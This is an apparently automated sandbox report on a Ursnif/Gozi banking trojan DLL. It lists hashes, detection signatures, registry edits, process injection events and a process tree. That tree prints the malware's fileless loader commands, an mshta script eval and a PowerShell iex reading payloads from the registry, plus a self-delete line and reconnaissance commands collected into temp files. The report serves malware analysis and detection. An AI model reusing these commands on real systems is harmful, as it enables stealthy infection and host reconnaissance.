gozi_ifsb | 99b6752f4009fd4bbf0c62cf0f30285fbf28bbdd3c5b7fee0bf1b7fe20a8a406

Analysis

max time kernel
150s
max time network
149s
platform
windows10_x64
resource
win10v20201028
submitted
01-12-2020 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5fc612703f844.dll
Size

122KB
MD5

897285413e9a2bc5207996e43432078f
SHA1

0da15676430232150a2b2d5b7b9a2cf19d7b3306
SHA256

99b6752f4009fd4bbf0c62cf0f30285fbf28bbdd3c5b7fee0bf1b7fe20a8a406
SHA512

20c986925305276ff52746e0cd8081d8174251e0392ed355a48d94d7febdd5c6955998d9255594b146926bf66886de067a0f942f34ab75b5f1f302794149c9d1

Score

10^/10

gozi_ifsb ursnif banker spyware trojan

Malware Config

Extracted

Family

ursnif

Attributes

dga_base_url
dga_crc
0
dga_season
0
dga_tlds
dns_servers

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif

ServiceHost packer 1 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/648-33-0x00000067C2E71000-mapping.dmp	servicehost

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4072 set thread context of 3024	4072	powershell.exe	Explorer.EXE
PID 3024 set thread context of 3460	3024	Explorer.EXE	RuntimeBroker.exe
PID 3024 set thread context of 648	3024	Explorer.EXE	cmd.exe
PID 648 set thread context of 3752	648	cmd.exe	PING.EXE
PID 3024 set thread context of 1300	3024	Explorer.EXE	WinMail.exe
PID 3024 set thread context of 1532	3024	Explorer.EXE	cmd.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3040 2728 WerFault.exe regsvr32.exe
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

2672 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1172 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1316 systeminfo.exe

pid	pid_target	process	target process
3040	2728	WerFault.exe	regsvr32.exe

pid	process
2672	net.exe

pid	process
1172	tasklist.exe

pid	process
1316	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 52 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0fc35ead0c7d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000f560fa61d50e1eaf6425679e387f85111dfcebd44d2073f26943814281450273000000000e800000000200002000000074a7a0f8b9929b06ca6fd5f5fcae97dba3cb568254c2e510905be1cabbc02d75200000001854554337b2b17c09e77381575feee5e9badbe5091ca6edd91c66145653b66340000000919ea345f3fcabacfe492aa2ddc83ce872439bda89d41c77799631a309d4c82c4309f79157ae1abfe358841d5f3d0b829ee693a2fdc8af81645a5d945897aaf8	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80f257ecd0c7d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3750033911"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000b1fb26f66a6d1eecab352f298866c2e97e3abb903b6644c31bae456ffa3551ff000000000e8000000002000020000000645e6f288e8a1927205b60bb27dfac73fb0457ecfcf48d01130906f7b33b814320000000f0d06602e09c29b7ab0fe63739142ecdb81848e522464907a6796b74209de06640000000326f5291ef0d10e781742527e55edf8ccfc50c11fedef5bf7f95db826395f5d04e8d6eb06ffcfa153f882281540b8c1a21e359890145a0243f338e7fc94ad5ad	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30853072"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000e754f33e0430755d29cfb8ff18b2c1aeea9bdf7aa09842c386afc7e4e4af7320000000000e8000000002000020000000ea12edce4a5bdec0b2be91a5544efe30a0122da52678349f8408e24520912c9620000000ef6e87c37c354fca5a1e1bad6df14d5c910e680ae157b7802aee9f3085f813384000000095fd9baf11960b686636e5a929aab787058bc99fc59a85601cbaa6f3575bfe016c7db79682098350ab3ac5da54d3e6f5a5f6facb6c02f06ed0b6f11d9a85ee4c	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30853072"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a0000000002000000000010660000000100002000000067a22c982b644c12b80c6ec11bb293592b781e6e4297e61a239dcf9a478c9cb3000000000e8000000002000020000000db64c8a12253604aa812c452f67d0aee49fd1e25fc79591a624ba0d1eec6904620000000ea2eda03144ae56c6c6dd05d7f1a366445de029cdd13cbb8ab09c6afb917a96b40000000aad886ff2b47a57b272fc7cbacc1f34478fdbcc70d2dbe4e6f30fd47ec557d3dc3ec5f3355d4592db295b1440f7e9932e0166645c5b520c80a6cb9e79f468a68	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000003db2fbe1abb85c27bdc60741d38a73d7b6d10fbb28161a25e6b3a68f57af26ca000000000e8000000002000020000000ff6853b77c0faae7122a00a254ea025034b440e26f0a37e3c16b8127bdc39de420000000f3b6f17d8998dc11b203c044e5e2cdcfc2230523dbc2b49cc8f2da1b815e9653400000001cd03ca5871d21c76780c0723377477b625d92df7271320a73feea2031916913f85f0b6aabb2185e9dcba7f4d8c9dc6faa8714cb8932f04953b013b249c4aa67	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0AF2E7DD-33C4-11EB-B59A-5E321723808D} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70802bebd0c7d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b006b9e2d0c7d601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90cfc9e2d0c7d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{26E113DA-33C4-11EB-B59A-5E321723808D} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3750033911"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3752 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3752 PING.EXE

pid	process
3752	PING.EXE

pid	process
3752	PING.EXE

Suspicious behavior: EnumeratesProcesses 1244 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXEWerFault.exe

pid	process
2728	regsvr32.exe
2728	regsvr32.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3040	WerFault.exe
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE
3024	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4072 powershell.exe
3024 Explorer.EXE
3024 Explorer.EXE
648 cmd.exe
3024 Explorer.EXE
3024 Explorer.EXE

pid	process
4072	powershell.exe
3024	Explorer.EXE
3024	Explorer.EXE
648	cmd.exe
3024	Explorer.EXE
3024	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exeExplorer.EXEWerFault.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	3024	Explorer.EXE
Token: SeCreatePagefilePrivilege	3024	Explorer.EXE
Token: SeRestorePrivilege	3040	WerFault.exe
Token: SeBackupPrivilege	3040	WerFault.exe
Token: SeDebugPrivilege	3040	WerFault.exe
Token: SeShutdownPrivilege	3024	Explorer.EXE
Token: SeCreatePagefilePrivilege	3024	Explorer.EXE
Token: SeShutdownPrivilege	3024	Explorer.EXE
Token: SeCreatePagefilePrivilege	3024	Explorer.EXE
Token: SeDebugPrivilege	1172	tasklist.exe
Token: SeShutdownPrivilege	3024	Explorer.EXE
Token: SeCreatePagefilePrivilege	3024	Explorer.EXE

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

iexplore.exeiexplore.exe

pid process

1332 iexplore.exe
1264 iexplore.exe
1264 iexplore.exe
1264 iexplore.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEExplorer.EXE

pid	process
1332	iexplore.exe
1332	iexplore.exe
3560	IEXPLORE.EXE
3560	IEXPLORE.EXE
1264	iexplore.exe
1264	iexplore.exe
204	IEXPLORE.EXE
204	IEXPLORE.EXE
1264	iexplore.exe
1264	iexplore.exe
204	IEXPLORE.EXE
204	IEXPLORE.EXE
1264	iexplore.exe
1264	iexplore.exe
4036	IEXPLORE.EXE
4036	IEXPLORE.EXE
3024	Explorer.EXE

Suspicious use of WriteProcessMemory 99 IoCs

Processes:

regsvr32.exeiexplore.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 1400 wrote to memory of 2728	1400	regsvr32.exe	regsvr32.exe
PID 1400 wrote to memory of 2728	1400	regsvr32.exe	regsvr32.exe
PID 1400 wrote to memory of 2728	1400	regsvr32.exe	regsvr32.exe
PID 1332 wrote to memory of 3560	1332	iexplore.exe	IEXPLORE.EXE
PID 1332 wrote to memory of 3560	1332	iexplore.exe	IEXPLORE.EXE
PID 1332 wrote to memory of 3560	1332	iexplore.exe	IEXPLORE.EXE
PID 1264 wrote to memory of 204	1264	iexplore.exe	IEXPLORE.EXE
PID 1264 wrote to memory of 204	1264	iexplore.exe	IEXPLORE.EXE
PID 1264 wrote to memory of 204	1264	iexplore.exe	IEXPLORE.EXE
PID 1264 wrote to memory of 4036	1264	iexplore.exe	IEXPLORE.EXE
PID 1264 wrote to memory of 4036	1264	iexplore.exe	IEXPLORE.EXE
PID 1264 wrote to memory of 4036	1264	iexplore.exe	IEXPLORE.EXE
PID 2648 wrote to memory of 4072	2648	mshta.exe	powershell.exe
PID 2648 wrote to memory of 4072	2648	mshta.exe	powershell.exe
PID 4072 wrote to memory of 716	4072	powershell.exe	csc.exe
PID 4072 wrote to memory of 716	4072	powershell.exe	csc.exe
PID 716 wrote to memory of 1508	716	csc.exe	cvtres.exe
PID 716 wrote to memory of 1508	716	csc.exe	cvtres.exe
PID 4072 wrote to memory of 420	4072	powershell.exe	csc.exe
PID 4072 wrote to memory of 420	4072	powershell.exe	csc.exe
PID 420 wrote to memory of 2280	420	csc.exe	cvtres.exe
PID 420 wrote to memory of 2280	420	csc.exe	cvtres.exe
PID 4072 wrote to memory of 3024	4072	powershell.exe	Explorer.EXE
PID 4072 wrote to memory of 3024	4072	powershell.exe	Explorer.EXE
PID 4072 wrote to memory of 3024	4072	powershell.exe	Explorer.EXE
PID 4072 wrote to memory of 3024	4072	powershell.exe	Explorer.EXE
PID 3024 wrote to memory of 648	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 648	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 648	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 3460	3024	Explorer.EXE	RuntimeBroker.exe
PID 3024 wrote to memory of 3460	3024	Explorer.EXE	RuntimeBroker.exe
PID 3024 wrote to memory of 3460	3024	Explorer.EXE	RuntimeBroker.exe
PID 3024 wrote to memory of 3460	3024	Explorer.EXE	RuntimeBroker.exe
PID 3024 wrote to memory of 648	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 648	3024	Explorer.EXE	cmd.exe
PID 648 wrote to memory of 3752	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 3752	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 3752	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 3752	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 3752	648	cmd.exe	PING.EXE
PID 3024 wrote to memory of 68	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 68	3024	Explorer.EXE	cmd.exe
PID 68 wrote to memory of 4092	68	cmd.exe	nslookup.exe
PID 68 wrote to memory of 4092	68	cmd.exe	nslookup.exe
PID 3024 wrote to memory of 2672	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 2672	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 852	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 852	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 1300	3024	Explorer.EXE	WinMail.exe
PID 3024 wrote to memory of 1300	3024	Explorer.EXE	WinMail.exe
PID 3024 wrote to memory of 1300	3024	Explorer.EXE	WinMail.exe
PID 852 wrote to memory of 1316	852	cmd.exe	systeminfo.exe
PID 852 wrote to memory of 1316	852	cmd.exe	systeminfo.exe
PID 3024 wrote to memory of 1300	3024	Explorer.EXE	WinMail.exe
PID 3024 wrote to memory of 1300	3024	Explorer.EXE	WinMail.exe
PID 3024 wrote to memory of 1532	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 1532	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 1532	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 1532	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 1532	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 1532	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 2660	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 2660	3024	Explorer.EXE	cmd.exe
PID 3024 wrote to memory of 4092	3024	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\system32\regsvr32.exe
  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\5fc612703f844.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\SysWOW64\regsvr32.exe
    /s C:\Users\Admin\AppData\Local\Temp\5fc612703f844.dll
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2728
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 668
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3040
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BFC92168-124C-49FC-1463-668D8847FA11\\\AppXxSip'));if(!window.flag)close()</script>"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\BFC92168-124C-49FC-1463-668D8847FA11").ActitLog))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agp5cn2x\agp5cn2x.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:716
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87AF.tmp" "c:\Users\Admin\AppData\Local\Temp\agp5cn2x\CSC47653255CBFF4684B676774CEB42813E.TMP"
        5⤵
        
        PID:1508
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ecmnxvr1\ecmnxvr1.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:420
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8993.tmp" "c:\Users\Admin\AppData\Local\Temp\ecmnxvr1\CSC6317CCE3CDE1451CADE7B112C8689999.TMP"
        5⤵
        
        PID:2280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\5fc612703f844.dll"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:648
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:3752
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\3BDD.bi1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:68
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:4092
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BDD.bi1"
  2⤵
  PID:2672
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:1316
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:1300
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  PID:2660
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  PID:4092
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:2672
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  PID:2276
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  PID:3724
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  PID:1908
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\752A.bin1"
  2⤵
  PID:1196
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- C:\Windows\system32\cmd.exe
